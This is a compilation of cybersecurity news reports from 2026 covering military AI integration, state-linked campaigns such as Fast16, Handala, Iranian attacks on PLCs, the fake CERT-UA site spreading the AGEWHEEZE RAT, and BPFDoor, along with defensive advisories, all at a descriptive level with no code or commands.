The Pentagon is integrating AI into military operations, transforming cybersecurity, targeting, and command systems into a unified warfare architecture.

May 2026 marks a turning point in the evolution of modern warfare: the convergence of artificial intelligence, cybersecurity, and conventional military power is no longer theoretical. It is becoming an operational reality.

The Pentagon has signed agreements with major technology companies, including OpenAI, Google, Microsoft, Amazon, and SpaceX to integrate advanced AI models into classified military networks. The stated goal is clear: transform the United States into an “AI-first” military force capable of maintaining decision superiority across every battlefield domain.

Under this strategy, AI is no longer treated as a laboratory tool or analytical assistant. It is moving directly into the military chain of command, intelligence analysis, logistics, targeting, and operational planning. More than 1.3 million Department of Defense employees are already using the GenAI.mil platform, dramatically reducing processes that once took months to just days.

The Pentagon’s doctrine reflects a major cultural shift: code and combat are no longer separate domains. Cybersecurity itself is now considered a combat capability. The ability to deploy, secure, update, and operate AI models inside classified environments has become part of national defense infrastructure.

The contracts signed with technology providers include “lawful operational use” clauses, requiring vendors to accept any use considered legitimate by the Pentagon, including autonomous weapons systems and intelligence operations. This raises profound ethical and geopolitical questions.

At the same time, the U.S. military is pushing for deep integration across defense systems. Through the Army’s new “Right to Integrate” initiative, manufacturers of missiles, drones, radars, and sensors are being asked to open their software interfaces so AI agents can connect systems in real time. The inspiration comes largely from Ukraine, where open APIs allowed rapid battlefield integration between drones, sensors, and fire-control systems.

However, this transformation creates a dangerous paradox: the same openness that enables speed and flexibility also expands the attack surface. Every API, cloud platform, and AI integration point can potentially become an entry point for sophisticated adversaries such as China, Russia, or state-sponsored APT groups.

A compromised AI-enabled military ecosystem could allow attackers to inject false sensor data, manipulate targeting systems, degrade drone communications, study operational decision patterns, or even hijack autonomous weapons platforms. In this context, software vulnerabilities and supply-chain weaknesses are no longer merely IT problems, they become military objectives.

Washington is also increasingly concerned about the cyber risks posed by advanced AI models themselves. According to reports, the White House is considering new oversight mechanisms for frontier AI systems capable of autonomously discovering software vulnerabilities or automating cyberattacks at scale. Officials fear that uncontrolled deployment of such models could lead to mass exploitation of critical infrastructure, financial systems, or global supply chains.

The strategic implications extend beyond military technology. Major cloud providers such as Amazon, Microsoft, and Google are gradually becoming part of the American defense architecture. Civilian digital infrastructure is evolving into a structural extension of military power.

This raises difficult questions for Europe and Italy. In a world where most cloud, AI, and cybersecurity infrastructures are controlled by American companies, what does technological sovereignty really mean? Sovereignty is no longer just about producing chips or funding startups. It is about controlling the digital infrastructure that supports national defense, determining who can update AI systems operating on classified networks, and deciding who sets the operational rules of software during crises.

The United States, Israel, and China are already integrating AI into military doctrine at high speed. Europe risks remaining trapped between regulation and technological dependence unless it develops its own industrial capabilities, operational autonomy, and independent evaluation frameworks.

The message coming from Washington is unmistakable: the future of strategic power will depend on who controls AI models, data, interfaces, and software-driven operational systems. In modern warfare, software has become a battlefield domain, and the speed of code deployment increasingly matters as much as firepower itself.

A more detailed analysis is available in Italian here.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, AI)

In the second timeline of April 2026 I collected 108 events, corresponding to an average of 7.2 events per day, a number that confirms a growing trend, driven by the increasing number of supply chain attacks, compared to the previous timeline, where I collected 94 events (6.27 events/day).

I aggregated the statistics created from the cyber attacks timelines published in the first quarter of 2026. In this period, I collected a total of 528 events (5.87 events/day) dominated by Cyber Crime with 66%, followed by Cyber Espionage with 18%, Hacktivism with 3%, and finally Cyber Warfare with 2%.

Fast16 is a pre-Stuxnet malware that tampered with precision software and spread itself. Evidence suggests links to U.S. operations during early cyber tensions.

SentinelOne uncovered Fast16, a sabotage malware used in 2005, years before Stuxnet. The malicious code is written in Lua and targeted high-precision calculation software, altering results and spreading across systems. The malware appeared in the ShadowBrokers leak of NSA tools, and evidence suggests it may have been developed by the United States, highlighting early cyber operations linked to tensions with Iran.

Researchers traced early advanced malware design by searching for the first use of embedded Lua engines, a feature later seen in tools like Flame and Project Sauron. Lua enables modular, flexible malware without recompilation. The analysis led to a 2005 sample, svcmgmt.exe, which contained an embedded Lua VM and encrypted bytecode. Though it looked like a simple service binary, deeper analysis revealed a sophisticated implant with encryption, Windows API access, and modular design. A debug path linked it to the fast16.sys driver, tying it to the early Fast16 framework.

The carrier svcmgmt.exe acts as a modular loader, using encrypted Lua payloads and “wormlets” to spread across Windows systems via network shares, while avoiding detection by checking for security tools. It can also deploy the kernel driver for deeper control.

The fast16.sys driver loads at boot and intercepts filesystem operations, modifying executable files in memory. It targets specific programs, especially precision calculation software compiled with Intel tools, and applies rule-based patches that subtly alter results using floating-point manipulation.

“The FPU patch in fast16.sys was written to corrupt these routines in a controlled way, producing alternative outputs. This moves fast16 out of the realm of generic espionage tooling and into the category of strategic sabotage.” continues the report. “By introducing small but systematic errors into physical‑world calculations, the framework could undermine or slow scientific research programs, degrade engineered systems over time or even contribute to catastrophic damage.”

This suggests a sabotage goal rather than simple espionage, aiming to corrupt scientific or engineering outputs while remaining stealthy and persistent across infected systems.

“A sabotage operation of this kind would be foiled by verifying calculations on a separate system. In an environment where multiple systems shared the same network and security posture, the wormable carrier would deploy the malicious driver module to those systems as well, reducing the chance that an independent calculation would diverge from the corrupted output.” reads the report published by SentinelOne. “At this time, we’ve been unable to identify all of the target binaries in order to understand the nature of the intended sabotage.”

Fast16 most likely targeted high-precision engineering and simulation software used in the mid-2000s, based on pattern matching of its patching rules. The strongest candidates include LS-DYNA 970 (used for crash, explosion, and structural simulations, including sensitive defense-related research), PKPM (a widely used Chinese structural design and seismic analysis suite), and MOHID (a hydrodynamic modeling platform for coastal and environmental simulations).

Analysis of compiler artifacts inside the malware suggests it came from an older, security-focused Unix engineering culture, with traces of SCCS/RCS versioning conventions unusual in Windows malware of that era. This points to a long-running, well-resourced development effort rather than opportunistic tooling.

The overall design of fast16 combines a Lua-based carrier, a kernel-level filesystem driver, and rule-based code patching. This structure enables controlled corruption of numerical outputs in specialized simulation software, potentially altering results in fields like structural engineering, physics modeling, and environmental analysis.

“This 2005 attack is a harbinger for sabotage operations targeting ultra expensive high-precision computing workloads of national importance like advanced physics, cryptographic, and nuclear research workloads.” concludes the report. “fast16 predates Stuxnet by at least five years, and stands as the first operation of its kind. The use of an embedded customized Lua virtual machine predates the earliest Flame samples by three years.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

UK National Cyber Security Centre (NCSC) warns China-linked hackers use hijacked devices as proxy networks to hide activity and evade detection.

UK National Cyber Security Centre (NCSC) and global partners warn that China-linked threat actors now rely on large proxy networks built of hacked consumer devices. Groups control routers, cameras, video recorders, and NAS systems to route attacks and mask their identity. This shift replaces smaller, dedicated infrastructure with vast botnets that help them blend into normal traffic and avoid detection.

China-nexus cyber actors use these botnets across the full Cyber Kill Chain, from reconnaissance to data theft. This model gives them a low-cost, flexible, and deniable setup that they can quickly reshape, making static IP blocklists far less effective.

“Covert networks enable China-nexus actors to launch cyber attacks against UK organisations, stealing sensitive data and potentially disrupting critical services.

Because the covert networks are constantly refreshed and share nodes across multiple threat groups, defenders face “IOC extinction” – indicators of compromise disappear as quickly as they are discovered.” reads the advisory. “Consequently, organisations that rely solely on static defences risk being bypassed, while those that adopt adaptive, intelligence driven measures can better mitigate the risk.”

National Cyber Security Centre and partners, including the Cyber League, released guidance to counter covert network threats. They advise organisations of all sizes to map and baseline traffic from edge devices, especially VPN and remote access connections. They also recommend using dynamic threat feed filtering that includes indicators of compromised infrastructure to improve detection and reduce exposure to hidden attack networks.

“Potential victims should implement two-factor authentication for remote access and, where possible, apply zero trust controls, IP allow lists, and machine certificate verification.” continues the advisory. “Larger or high-risk entities should consider active hunting of suspicious SOHO/IOT traffic, geographic profiling, and machine learning based anomaly detection.”

National Cyber Security Centre explains that China-linked covert networks keep evolving, with new and updated infrastructures appearing regularly due to countermeasures, exploits, and technical changes.

“The number of covert networks used by China-nexus cyber actors is large, with new networks regularly developed and deployed.” reads the joint advisory. “The existing covert networks change too, either because of defensive or legal action, or simply as a result of software updates and new exploits being used to target different technologies for incorporation into the network.”

Because these networks change so often, full technical descriptions quickly become outdated and offer limited value for defenders. Still, most share a common structure: an operator enters through an on-ramp or entry node, then routes traffic across multiple compromised devices acting as traversal nodes, before exiting through an exit node that often sits near the target’s region. Understanding this basic flow helps defenders identify where they sit in the chain and improve detection and response strategies against these dynamic proxy-based networks.

NCSC provides tailored guidance to defend against covert networks built from compromised devices. It explains that defending these attacks requires layered strategies based on an organisation’s size and risk level, and it does not eliminate all risk.

All organisations should map internet-facing assets, baseline normal traffic, especially VPN and remote connections, and use dynamic threat feeds that include covert infrastructure indicators. They should also deploy multi-factor authentication and consider tools like the Cyber Action Toolkit and Cyber Essentials.

Higher-risk organisations should strengthen controls with IP allow lists, geographic and behavioural filtering, zero trust models, SSL machine certificates, and reduced internet exposure. They should also explore anomaly detection using machine learning.

The largest or most exposed organisations should actively hunt for signs of covert networks, track known infrastructure using threat intelligence, analyse NetFlow data, and integrate dynamic blocklists and alerts. For critical sectors, the Cyber Assessment Framework supports advanced defensive maturity.

Federal Bureau of Investigation reports describe large China-linked botnets, such as Raptor Train, used for state-aligned cyber activity. In September 2024, researchers from Lumen’s Black Lotus Labs discovered the Raptor Train botnet, composed of small office/home office (SOHO) and IoT devices. The experts believe the botnet is controlled by the China-linked APT group Flax Typhoon (also called Ethereal Panda or RedJuliett). The botnet has been active since at least May 2020, reaching its peak with 60,000 compromised devices in June 2023.

Since May 2020, over 200,000 devices, including SOHO routers, NVR/DVR devices, NAS servers, and IP cameras, have been compromised and added to the Raptor Train botnet, making it one of the largest China-linked IoT botnets discovered. 

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, China)

The first timeline of April 2026 brings an evolution in terms of methodology: from now on I will map the initial access techniques with the MITRE ATT&CK model. I also decided to merge the categories of Finance and Fintech in the sectors chart. From an event perspective, the first half of April 2026 confirmed a sustained trend...

The post The Forbidden Model: Why the NSA is Secretly Using Anthropic’s Mythos AI Despite a Federal Ban appeared first on Daily CyberSecurity.

Sweden says a pro-Russian group attacked a heating plant in 2025. The failed cyberattack highlights growing threats to Europe’s energy infrastructure.

Sweden has blamed a pro-Russian group linked to Russian intelligence for a failed cyberattack on a heating plant in 2025. Officials say the incident is part of a broader wave of attacks targeting critical infrastructure across Europe. Similar operations have been reported in Poland, affecting energy systems serving hundreds of thousands of people, raising concerns over escalating cyber threats tied to Russia.

Sweden has publicly confirmed for the first time a failed cyberattack on a heating plant in the west, according to Civil Defense Minister Carl-Oskar Bohlin. The Minister linked the incident to a wave of similar attacks that targeted Poland, where energy facilities serving 500,000 people were hit, with evidence pointing to Russian-linked hackers.

“The attacks are among more than 150 incidents of sabotage and malign activity across Europe tracked by The Associated Press and linked to Russia by Western officials since Moscow’s full-scale invasion of Ukraine in February 2022.” reported the report published by Associated Press. “Officials say a goal of the attacks is to undermine support for Ukraine, spread fear and discord in European societies and drain investigative resources.

Cyberattacks linked to Russia have increasingly targeted European countries and their critical infrastructure, often seen as retaliation for support to Ukraine. Energy grids, water systems, and transport networks have been disrupted or probed in coordinated campaigns. These operations combine cyber sabotage, espionage, and influence tactics, aiming to create instability and test resilience. While often limited in immediate impact, they signal a broader strategy of hybrid warfare, where digital attacks complement geopolitical pressure across Europe.

The Kremlin has denied any role in sabotage across Europe, despite multiple incidents blamed on pro-Russian actors. In 2024, cyberattacks in Denmark disrupted a water utility, leaving homes without supply. Norwegian authorities reported hackers remotely opening a dam valve, while Latvia linked arson attacks on rail infrastructure to individuals acting in Russia’s interests, highlighting a pattern of hybrid threats.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Sweden)

After the cyber attacks timelines, it’s time to publish the statistics for March 2026 where I collected and analyzed 282 events: a sharp increase compared to the 176 events of the previous month. In March 2026, Cyber Crime continued to lead the Motivations chart with 64%, ahead of Cyber Espionage at number two with 15%. Hacktivism took over the third position with 6%, ahead of Cyber Warfare with 3%.

The second half of March 2026 has been very active from an infosec standpoint, with 124 events and a threat landscape dominated by malware. As always, cyber crime led the motivations chart with 65%, slightly up from the previous timeline.

Iran-linked group Handala claims to have breached three major UAE organizations, Dubai Courts, Dubai Land Department, and Dubai Roads & Transport Authority

The group Handala claimed a major cyberattack against the UAE, targeting Dubai Courts Department, Dubai Land Department, and Dubai Roads and Transport Authority.

They alleged destroying 6 petabytes of data and stealing 149 TB of sensitive information, framing the attack as retaliation and a warning to regional governments, though such claims remain unverified.

“In response to the blatant betrayal of the Resistance Axis by the Epsteinist leaders of the UAE, and as a serious, preemptive warning to all treacherous governments in the region, Handala has launched one of its most powerful cyberattacks against the country’s critical infrastructure.” the group wrote on its Tor website. “During this operation, 6 petabytes of data have been completely destroyed…”

Handala appears as a pro-Palestinian hacktivist group but is widely seen as a front for Iran-backed Void Manticore. Known for phishing, data theft, extortion, and destructive wiper attacks, they also engage in info operations and psychological warfare. Since the Iran conflict began, they’ve targeted Israeli military servers, intelligence officers, and companies, stealing or wiping data.

In early April, the group announced that it breached PSK Wind Technologies, an Israeli engineering and IT firm specializing in integrated systems for defense and critical communications, including command and control solutions.

Since the U.S.-Israeli war with Iran began in February, the Iran-linked group Handala has intensified its cyberattacks. It claimed responsibility for a destructive breach at medical tech firm Stryker that targeted its internal Microsoft environment and remotely wiped tens of thousands of employee devices without using malware. 

The group claimed it wiped more than 200,000 servers, mobile devices, and other systems, forcing the company to shut down offices across 79 countries. The hacktivists also claimed they exfiltrated about 50TB of corporate data from the company’s infrastructure.

Recently, the Iran-linked hacking group Handala claimed the hack of the FBI Director Kash Patel’s personal Gmail account and shared alleged data, including photos and files.

The FBI is offering up to $10 million for information on the Handala hackers.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Handala)

The Persian Gulf is a strategically sensitive region due to energy reserves, maritime trade routes, and ongoing geopolitical rivalries. The recent escalation involving Iran and regional adversaries has reinforced instability in the region and highlighted the growing relevance of Gulf cybersecurity, alongside traditional security concerns.   The expansion of missile systems, drones, and cyber capabilities has increased the likelihood that conflicts could affect both physical infrastructure and digital systems, strengthening the importance of cybersecurity in Middle East frameworks. 

Iran Crisis and Cybersecurity in Gulf Infrastructure Risks 

The Iran crisis has shown that Gulf states are directly exposed to regional conflicts. Critical infrastructure such as ports, energy facilities, desalination plants, and financial hubs has become vulnerable to disruption.   This has increased the role of cybersecurity in Gulf planning as states focus on protecting both operational technology and digital systems that support essential services. For the UAE, this exposure has reinforced the need to secure economic and strategic assets against both kinetic and cyber threats. As a result, cybersecurity in the Middle East is integrated into national security strategies. 

RSCT Perspective and Cybersecurity in Middle East Interdependence 

Regional Security Complex Theory (RSCT), developed by Barry Buzan and Ole Wæver, explains that security threats in the Gulf are interlinked, meaning instability in one state affects others. The Iran crisis reflects this dynamic, where missile strikes, drone operations, and cyber activity can rapidly influence regional stability.  Within this structure, Gulf cybersecurity is also interdependent. A cyberattack on energy or financial infrastructure in one Gulf state can affect supply chains, markets, and maritime operations across the region. This makes cybersecurity in the Middle East a shared regional issue rather than a purely national concern. 

UAE Military Modernization and Cybersecurity in Gulf Defense Posture 

The UAE has expanded its defense capabilities, strengthened strategic partnerships, and engaged in regional security initiatives. It has also adopted a defensive posture relying on systems such as THAAD and Patriot to intercept and neutralize incoming missile threats.  Alongside missile defense, cybersecurity in Gulf resilience has become part of national defense priorities. The increasing use of drones, cyber operations, and long-range missiles has required integration of cyber defense with conventional military systems. This reflects broader cybersecurity in the Middle East adaptation to hybrid warfare. 

Economic Security, Strait of Hormuz, and Gulf Cybersecurity Exposure 

The Iran crisis has reinforced the link between economic and national security in the Gulf. The Strait of Hormuz remains a critical chokepoint for global energy transport, and disruptions have direct effects on trade and supply chains.  Cities such as Dubai and Abu Dhabi function as major global economic hubs. Any disruption to ports, energy systems, or financial infrastructure, whether physical or cyber, can have international consequences. This has increased focus on Gulf cybersecurity to protect economic continuity and system resilience.  Gulf Cooperation Council (GCC) states have discussed deeper security integration, including coordinated air defense systems, intelligence sharing, and maritime security cooperation. These initiatives aim to reduce reliance on external security guarantees while improving regional response capacity. At the same time, states are diversifying partnerships beyond traditional allies. Cooperation with countries such as Pakistan, as well as European and Asian partners, reflects strategic hedging. This diversification extends to cybersecurity in the Middle East, where states seek broader cooperation on digital threats and intelligence exchange.

U.S. agencies warn Iran-linked threat actors are targeting internet-exposed PLCs used in critical infrastructure networks.

U.S. agencies, including the FBI and CISA, warn that Iran-linked hackers are targeting internet-exposed Rockwell/Allen-Bradley PLCs used in critical infrastructure. The agencies published a joint advisory involving multiple federal organizations.

“Iran-affiliated advanced persistent threat (APT) actors are conducting exploitation activity targeting internet-facing operational technology (OT) devices, including programmable logic controllers (PLCs) manufactured by Rockwell Automation/Allen-Bradley.” reads the joint advisory. “This activity has led to PLC disruptions across several U.S. critical infrastructure sectors through malicious interactions with the project file and manipulation of data on human machine interface (HMI) and supervisory control and data acquisition (SCADA) displays, resulting in operational disruption and financial loss.”

Threat actors are carrying out cyberattacks targeting internet-connected operational technology (OT) across multiple critical infrastructure sectors. Iran-linked actors are believed to be behind the activity, aiming to cause disruption in areas such as government services, water systems, and energy.

The attacks involve manipulating project files and altering data shown on HMI and SCADA systems, leading in some cases to operational disruptions and financial losses. Authorities urge organizations to review indicators of compromise and apply mitigations to reduce risks. The campaign has been linked to groups like CyberAv3ngers, associated with Iran’s IRGC.

Organizations are advised to assess exposed devices, follow security guidance from vendors, disconnect systems from the internet where possible, and coordinate with authorities for incident response and mitigation support.

“The FBI assesses a group of Iranian-affiliated APT actors are targeting internet-exposed PLCs with the intent to cause disruptions—including maliciously interacting with project files, and manipulating data displayed on HMI and SCADA displays—to U.S. critical infrastructure organizations.” conctinues the alert. “Iranian-affiliated APT targeting campaigns against U.S. organizations have recently escalated, likely in response to hostilities between Iran, and the United States and Israel.

During a campaign starting in November 2023, IRGC-linked hackers known as CyberAv3ngers targeted U.S. PLCs and HMIs, disrupting operations. Also tracked under multiple names, the group compromised at least 75 devices, including Unitronics PLCs used across sectors like water and wastewater systems.

“During a similar campaign beginning in November 2023, the IRGC CEC-affiliated cyber threat actors known as “CyberAv3ngers” targeted U.S.-based PLCs and HMIs, causing disruptive effects. Private industry and open sources also refer to this group as Hydro Kitten, Storm-0784, APT Iran, Bauxite, Mr. Soul, Soldiers of Solomon, UNC5691, and the Shahid Kaveh Group. These attacks compromised at least 75 devices, targeting U.S.-based Unitronics PLC devices with an HMI used across multiple critical infrastructure sectors, including WWS”

According to the joint advisory, Iran-linked actors gained initial access to internet-facing Rockwell/Allen-Bradley PLCs using overseas IPs and leased infrastructure, leveraging tools like Studio 5000 Logix Designer. They targeted devices such as CompactLogix and Micro850. For command and control, attackers used ports including 44818, 2222, 102, 22, and 502, and deployed SSH tools like Dropbear for remote access. Activity suggests possible targeting of other vendors, including Siemens PLCs. The attacks enabled the extraction of project files and manipulation of data on HMI and SCADA systems, causing disruption.

Government experts recommend disconnecting PLCs from the internet or protecting them with a firewall, monitoring OT ports for suspicious traffic, scanning logs for indicators of compromise, enabling multifactor authentication, updating firmware, disabling unused services or default keys, and continuously monitoring network activity.

In Mid-March, EU sanctioned Chinese and Iranian firms and individuals for cyberattacks targeting critical infrastructure and over 65,000 devices across member states.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Iran)

A new U.S. government advisory has raised fresh concerns over Iranian-affiliated APT targeting PLCs, warning that cyberattacks are now moving beyond data theft into direct disruption of industrial systems. Issued on April 7, 2026, the joint alert from the FBI, CISA, NSA and other agencies confirms that Iran-linked threat actors are actively exploiting internet-facing programmable logic controllers (PLCs), with incidents already impacting multiple critical infrastructure sectors. This is not a theoretical threat. According to the advisory, several organizations have experienced operational disruptions and even financial losses after attackers interfered with industrial processes.

From Network Access to Operational Disruption

What makes this campaign stand out is its intent. The Iranian-affiliated APT targeting PLCs activity is not focused on espionage, it is designed to disrupt. Attackers have been manipulating PLC project files and altering data displayed on human machine interface (HMI) and supervisory control and data acquisition (SCADA) systems. In practice, this means operators could be relying on inaccurate data while underlying processes are being changed in real time. The affected sectors include government services, water and wastewater systems, and energy, areas where even minor disruptions can have significant downstream impact. [caption id="attachment_111119" align="aligncenter" width="600"] Image Source: FBI[/caption]

How the Attacks Are Carried Out

The entry point is often simple: internet exposure. The advisory notes that attackers are scanning for publicly accessible PLCs, particularly models such as CompactLogix and Micro850—and connecting to them using legitimate engineering tools like Studio 5000 Logix Designer. Once inside, the activity becomes more deliberate. Threat actors extract configuration files, modify logic, and establish persistence. In some cases, they deploy tools like Dropbear SSH to maintain remote access through port 22. The attacks rely on commonly used industrial communication ports, including 44818, 2222, 102, 22, and 502, allowing malicious traffic to blend in with normal OT operations. Investigators also observed the use of overseas IP addresses and leased third-party infrastructure, suggesting a coordinated and sustained effort rather than opportunistic scanning.

A Campaign That Has Been Building Over Time

The current activity is not happening in isolation. U.S. agencies link it to earlier Iran-aligned operations, including campaigns attributed to the CyberAv3ngers group that targeted PLCs in 2023. What has changed is the persistence. The latest advisory tracks activity spanning from at least January 2025 through March 2026, with ongoing incidents reported as recently as March. Officials suggest the escalation may be tied to broader geopolitical tensions, but the technical pattern is clear: industrial control systems are becoming a repeated target.

Exposure and Weak OT Security

The Iranian-affiliated APT targeting PLCs campaign exposes a long-standing weakness in critical infrastructure, too many industrial devices remain directly accessible from the internet. In many cases, attackers did not need sophisticated exploits. They gained access because systems lacked basic protections like network segmentation, strong authentication, or restricted remote access. The result is a dangerous scenario where adversaries can move from initial access to operational control with relatively little resistance.

What Organizations Are Being Urged to Do

The advisory calls for immediate action, starting with visibility. Organizations are urged to review logs for suspicious traffic, especially connections originating from overseas infrastructure, and check for unusual activity on key OT ports. More broadly, the guidance reinforces a set of practical steps: removing PLCs from direct internet exposure, routing access through secure gateways, enabling stronger authentication controls, and maintaining offline backups of PLC logic and configurations. In some cases, even operational settings matter, such as ensuring controllers remain in “run” mode to prevent unauthorized remote changes.

A Shift in Cyber Threat Priorities

The bigger takeaway is the shift in attacker focus. By targeting PLCs, threat actors are going straight to the systems that control physical processes. This marks a move from cyber intrusion to potential real-world disruption. The advisory also highlight the role of manufacturers, urging a stronger push toward “secure-by-design” systems that are not exposed by default. For now, the warning is clear: as long as industrial systems remain exposed, campaigns like Iranian-affiliated APT targeting PLCs are likely to continue, and could become more disruptive over time.

Cyber warfare is no longer an obscure strategy—it's the primary arena of global conflict. Explore how Generative AI, "Living off the Land" techniques, and vendor concentration are creating a new era of systemic risk for enterprises.

The post The Future of Cyber Warfare and its Impact on Global Business Stability  appeared first on Security Boulevard.

Iran-linked hackers claim to have breached Israeli air defence contractor PSK Wind, which develops command and control systems.

Pro-Iran Handala group announced on April 2 that it breached PSK Wind Technologies, an Israeli engineering and IT firm specializing in integrated systems for defense and critical communications, including command and control solutions.

Handala appears as a pro-Palestinian hacktivist group but is widely seen as a front for Iran-backed Void Manticore, as reported by SecurityWeek. Known for phishing, data theft, extortion, and destructive wiper attacks, they also engage in info operations and psychological warfare. Since the Iran conflict began, they’ve targeted Israeli military servers, intelligence officers, and companies, stealing or wiping data.

The Handala claims to have stolen sensitive data from PSK Wind, including documents on command and control systems, allegedly sending it to “Axis of Resistance” missile units. The Axis of Resistance is an Iran-led political and military alliance of groups opposing Israel, the US, and allies, including Hezbollah in Lebanon, Palestinian Islamic Jihad, Syrian regime forces, and Shia militias in Iraq like Kata’ib Hezbollah.

Handala issued a threat coinciding with Passover, a major Jewish holiday that commemorates the Israelites’ liberation from slavery in ancient Egypt, warning of attacks on Israeli defense and command centers.

At this time, neither PSK Wind nor the Israeli military commented, while the group released confidential files showcasing top secret communications systems, internal documents, location photos and more.

BREAKING: Iranian nation-state threat actor Handala has breached Israeli defense contractor PSK Wind Technologies.

They've released confidential files showcasing top secret communications systems, internal documents, location photos and more. pic.twitter.com/w2Li9P1ZLp

— International Cyber Digest (@IntCyberDigest) April 2, 2026

The PSK Wind attack is part of an ongoing wave of cyber attacks on Israeli military infrastructure since February 28, coinciding with missile and drone strikes by Iran and its allies. Hackers claim the firm manages Israel’s air defence command centers, critical to systems like Iron Dome.

Since the U.S.-Israeli war with Iran began in February, the Iran-linked group Handala has intensified its cyberattacks. It claimed responsibility for a destructive breach at medical tech firm Stryker that targeted its internal Microsoft environment and remotely wiped tens of thousands of employee devices without using malware. 

The group claimed it wiped more than 200,000 servers, mobile devices, and other systems, forcing the company to shut down offices across 79 countries. The hacktivists also claimed they exfiltrated about 50TB of corporate data from the company’s infrastructure.

Recently, the Iran-linked hacking group Handala claimed the hack of the FBI Director Kash Patel’s personal Gmail account and shared alleged data, including photos and files.

The FBI is offering up to $10 million for information on the Handala hackers.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Handala)

The post The Spider’s Web: How Iranian Hackers Compromised FBI Director Kash Patel’s Personal Gmail appeared first on Daily CyberSecurity.

Ukraine's frontline cyber defense agency became the subject of its own investigation last week after an unknown threat actor built a convincing fake version of its website, sent emails impersonating its staff and instructed recipients across the country to download malware packaged as official security software. The Computer Emergency Response Team of Ukraine, CERT-UA, disclosed on Sunday, that between March 26 and 27, attackers distributed emails falsely attributed to CERT-UA, urging recipients to download a password-protected archive named either "CERT_UA_protection_tool.zip" or "protection_tool.zip". The file was made available for download from Files.fm file-sharing service and installed what the messages described as specialized protective software. The phishing emails were targeted at a broad cross-section of Ukrainian institutions including government organizations, medical centers, security companies, educational institutions, financial institutions and software development firms. Supporting the phishing campaign, attackers had registered and populated a counterfeit website at cert-ua[.]tech — a domain created on March 27, just one day into the distribution window. The look-a-like website had content lifted directly from the official CERT-UA website at cert[.]gov[.]ua, alongside fabricated instructions for downloading the malicious "protection tool." The executable file inside those archives was not protective software. CERT-UA classified it as AGEWHEEZE, a full-featured Remote Access Trojan (RAT) written in the Go programming language. A RAT is malware that gives an attacker complete remote control over an infected machine: not just file access, but live screen viewing, keyboard and mouse emulation, command execution, process and service management, clipboard reading and writing, and the ability to shut down, restart, or lock the device entirely. AGEWHEEZE's command set is exhaustive and purpose-built for persistent, covert control. It supports screen capture and real-time input emulation, full file system operations including read, write, delete, rename, and directory creation, process killing, service control, autorun management, terminal access, and the ability to open arbitrary URLs on the victim machine. AGEWHEEZE establishes persistence through the Windows registry startup key, the Startup directory, or a scheduled task, creating entries named "SvcHelper" or "CoreService" depending on the infection path. All communications to its command-and-control server route over WebSocket connections to a server hosted on infrastructure belonging to French cloud provider OVH. That command-and-control server carried its own revealing details. On port 8443, a web page titled "The Cult" displayed an authentication form. Buried in the HTML source of that page, investigators found Russian-language text reading: "Membership suspended. Your access to the Cult has been blocked. Contact the administrator to restore it." The self-signed SSL certificate on the server was created on March 18, with "TVisor" listed in the Organization field, matching the internal package name found inside the malware itself: "/example.com/tvisor/agent. Attribution arrived quickly and from the attackers themselves. A review of the AI-generated fake website at cert-ua[.]tech uncovered a line embedded in the HTML code reading: "With Love, CYBER SERP — https://t[.]me/CyberSerp_Official." [caption id="attachment_110836" align="aligncenter" width="600"] Fake website and HTML code embedding CyberSerp details. (Source: CERT-UA)[/caption] On March 28, the day after the campaign launched, the Telegram channel referenced in that code published a message claiming responsibility for the attack, eliminating any ambiguity about attribution. CERT-UA created the tracking identifier UAC-0255 for this activity. The agency assessed the cyberattack as "unsuccessful." No more than a few personal devices belonging to employees of educational institutions were identified as infected. CERT-UA said its specialists provided methodological and practical assistance to affected parties, and acknowledged Ukrainian electronic communications providers for their contribution to delivering cyber threat information to subscribers and maintaining national cyber incident response infrastructure. CERT-UA itself has previously documented campaigns by multiple threat groups — including UAC-0002, UAC-0035, and the group tracked here as UAC-0252 — that similarly weaponize government branding. In this case, the attackers targeted the cyber defense agency whose name carries the highest authority in Ukrainian information security communications, turning that trust directly against the institutions that rely on it. CERT-UA noted that the development of artificial intelligence significantly simplifies the execution of cyber threats. The attackers' own use of an AI-generated phishing site is a direct illustration of that warning, the cyber defense agency explained. It recommended that organizations reduce their attack surface by configuring standard operating system protections including Software Restriction Policies and AppLocker, and deploying specialized endpoint protection tools. Full indicators of compromise including file hashes, network indicators, and host-based artifacts are available in the CERT-UA advisory.

Also read: Hackers Exploit RDP Tools to Breach Ukraine’s Notarial Offices, CERT-UA Reports

China-linked Red Menshen APT group used stealthy BPFDoor implants in telecom networks to spy on government targets.

Rapid7 Labs uncovered a China-linked threat group known as Red Menshen has been running a long-term espionage campaign by infiltrating telecom networks, mainly in the Middle East and Asia. Active since at least 2021, the group uses highly stealthy BPFDoor implants to maintain hidden access inside critical infrastructure.

This strategic positioning allows attackers to quietly monitor and potentially spy on government communications. Researchers describe these implants as extremely hard to detect, acting like “digital sleeper cells” embedded deep within telecom environments for prolonged surveillance.

Compromised telecoms threaten entire populations, not just individual companies, as they carry critical communications and digital identities. Over the past decade, similar state-backed intrusions have targeted multiple countries, exposing call records, sensitive communications, and trusted operator links, revealing a worrying global pattern.

Investigations reveal a structured, long-term campaign by a China-linked threat actor targeting telecommunications infrastructure. Rather than short-term intrusions, the operation plants “sleeper cells”, dormant footholds embedded deep within networks to maintain persistent access over extended periods. Recurring tools in the attackers’ arsenal include kernel-level implants, passive backdoors, credential-harvesting utilities, and cross-platform command frameworks, forming a layered, stealthy access model. Experts highlighted the central role of BPFdoor, a Linux backdoor operating within the kernel that activates only when triggered by specially crafted packets, without exposing ports or command-and-control channels. By positioning below traditional visibility layers, this approach complicates detection and demonstrates a shift toward deep, covert tradecraft. BPFdoor is not an isolated tool but part of a broader, scalable intrusion model targeting telecom environments at high stealth.

